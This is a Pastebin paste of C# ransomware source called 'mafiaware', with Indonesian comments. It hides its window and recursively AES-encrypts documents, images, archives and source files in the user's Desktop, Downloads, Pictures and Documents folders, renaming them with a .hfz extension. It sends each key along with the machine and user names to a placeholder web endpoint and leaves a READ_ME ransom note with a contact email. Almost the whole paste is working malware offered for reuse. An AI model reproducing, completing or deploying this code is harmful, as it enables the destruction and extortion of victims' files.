Advertisement
Guest User

Ransom

a guest
Oct 20th, 2016
76
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. /*
  2. *
  3. * RANSOMWARE
  4. * Algorithm from HT, with C Sources
  5. * Encrypt with AES256
  6. *
  7. */
  8.  
  9. using System;
  10. using System.Diagnostics;
  11. using System.Collections.Generic;
  12. using System.ComponentModel;
  13. using System.Data;
  14. using System.Drawing;
  15. using System.Linq;
  16. using System.Text;
  17. using System.Threading.Tasks;
  18. using System.Windows.Forms;
  19. using System.Security;
  20. using System.Security.Cryptography;
  21. using System.IO;
  22. using System.Net;
  23. using Microsoft.Win32;
  24. using System.Runtime.InteropServices;
  25. using System.Text.RegularExpressions;
  26.  
  27. namespace mafiaware {
  28. public partial class Form1 : Form {
  29. //Web untuk Password Unlock nya
  30. string webPass = "https://yourweb.com/cyberking/w00t.php?g0ttrap=";
  31. string namaUser = Environment.UserName;
  32. string namaKompi = System.Environment.MachineName.ToString();
  33. string dirUsr = "C:\\Users\\"; //folder User
  34. // bisa di coba ke folder system32
  35. //string dirSystm = "C:\\Windows\\"; <-- folder Windows di targetkan ke system32 di ubah/tambah bagian fungsi ngencrypt nya
  36.  
  37. public Form1() {
  38. InitializeComponent();
  39. }
  40. private void Form1_Load(object sender, EventArgs e) {
  41. Opacity = 0;
  42. this.ShowInTaskbar = false;
  43. ngeEnrypt(); //mulai ngencrypt nya pas loading
  44. ngeEnrypt2();
  45. ngeEnrypt3();
  46. ngeEnrypt4();
  47. }
  48. private void Form_Shown(object sender, EventArgs e) {
  49. Visible = false;
  50. Opacity = 100;
  51. }
  52.  
  53. //Algo encrypt AES256
  54. public byte[] AES_Encrypt(byte[] bytesToBeEncrypted, byte[] passwordBytes) {
  55. byte[] encryptedBytes = null;
  56. byte[] saltBytes = new byte[] { 1, 2, 3, 4, 5, 6, 7, 8 };
  57. using (MemoryStream ms = new MemoryStream()) {
  58. using (RijndaelManaged AES = new RijndaelManaged()) {
  59. AES.KeySize = 256;
  60. AES.BlockSize = 128;
  61. var key = new Rfc2898DeriveBytes(passwordBytes, saltBytes, 1000);
  62. AES.Key = key.GetBytes(AES.KeySize / 8);
  63. AES.IV = key.GetBytes(AES.BlockSize / 8);
  64. AES.Mode = CipherMode.CBC;
  65. using (var cs = new CryptoStream(ms, AES.CreateEncryptor(), CryptoStreamMode.Write)) {
  66. cs.Write(bytesToBeEncrypted, 0, bytesToBeEncrypted.Length);
  67. cs.Close();
  68. }
  69. encryptedBytes = ms.ToArray();
  70. }
  71. }
  72. return encryptedBytes;
  73. }
  74.  
  75. //buat randompass encrypt
  76. public string BuatPass(int length) {
  77. const string valid = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890*!=&?&/";
  78. StringBuilder res = new StringBuilder();
  79. Random rnd = new Random();
  80. while (0 < length--){
  81. res.Append(valid[rnd.Next(valid.Length)]);
  82. }
  83. return res.ToString();
  84. }
  85.  
  86. //ngirim pass hasil trap ke web
  87. public void ngirimPass(string password){
  88. string g0ttrap = namaKompi + "-" + namaUser + " " + password;
  89. var fullUrl = webPass + g0ttrap;
  90. var conent = new System.Net.WebClient().DownloadString(fullUrl);
  91. }
  92.  
  93. //ngencrypt file
  94. public void ngencryptFile(string file, string password) {
  95. byte[] bytesToBeEncrypted = File.ReadAllBytes(file);
  96. byte[] passwordBytes = Encoding.UTF8.GetBytes(password);
  97.  
  98. //ngehash pass dg sha256
  99. passwordBytes = SHA256.Create().ComputeHash(passwordBytes);
  100. byte[] bytesEncrypted = AES_Encrypt(bytesToBeEncrypted, passwordBytes);
  101. File.WriteAllBytes(file, bytesEncrypted);
  102. System.IO.File.Move(file, file+".hfz"); //ekstensi hasil ngencrypt
  103. }
  104.  
  105. //ngencrypt folder
  106. public void ngencryptFolder(string location, string password) {
  107. //ekstensi yang mau di encrypt
  108. var validExtensions = new[] {
  109. ".txt", ".doc", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd", ".zip", ".rar"
  110. };
  111.  
  112. string[] files = Directory.GetFiles(location);
  113. string[] childDirectories = Directory.GetDirectories(location);
  114. for (int i = 0; i < files.Length; i++){
  115. string extension = Path.GetExtension(files[i]);
  116. if (validExtensions.Contains(extension))
  117. {
  118. ngencryptFile(files[i],password);
  119. }
  120. }
  121. for (int i = 0; i < childDirectories.Length; i++){
  122. ngencryptFolder(childDirectories[i],password);
  123. }
  124. }
  125. public void ngeEnrypt() {
  126. string password = BuatPass(15);
  127. string path = "\\Desktop";
  128. string startPath = dirUsr + namaUser + path;
  129. ngirimPass(password);
  130. ngencryptFolder(startPath,password);
  131. pesanReadMe();
  132. password = null;
  133. System.Windows.Forms.Application.Exit();
  134. }
  135. public void ngeEnrypt2() {
  136. string password = BuatPass(15);
  137. string path = "\\Downloads";
  138. string startPath = dirUsr + namaUser + path;
  139. ngirimPass(password);
  140. ngencryptFolder(startPath,password);
  141. password = null;
  142. System.Windows.Forms.Application.Exit();
  143. }
  144. public void ngeEnrypt3() {
  145. string password = BuatPass(15);
  146. string path = "\\Pictures";
  147. string startPath = dirUsr + namaUser + path;
  148. ngirimPass(password);
  149. ngencryptFolder(startPath,password);
  150. password = null;
  151. System.Windows.Forms.Application.Exit();
  152. }
  153.  
  154. //ngencrypt 4 bagian document, jika ada folder music / shortcut music, itu ga bakal kena, perbedaan auth
  155. public void ngeEnrypt4() {
  156. string password = BuatPass(15);
  157. string path = "\\Documents";
  158. string startPath = dirUsr + namaUser + path;
  159. ngirimPass(password);
  160. ngencryptFolder(startPath,password);
  161. password = null;
  162. System.Windows.Forms.Application.Exit();
  163. }
  164. //Pesanini diletakkan di folder desktop ( bisa di ubah atau di tambah lokasi nya, edit di bagian fungsi ngencrypt )
  165. public void pesanReadMe() {
  166. string path = "\\Desktop\\READ_ME.txt";
  167. string fullpath = dirUsr + namaUser + path;
  168. string[] lines = { "Cyberking was Encrypt your File with MafiaWare", "Email me and meet me", "my email cyberking@indonesianbacktrack.or.id" };
  169. System.IO.File.WriteAllLines(fullpath, lines);
  170. }
  171. }
  172. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement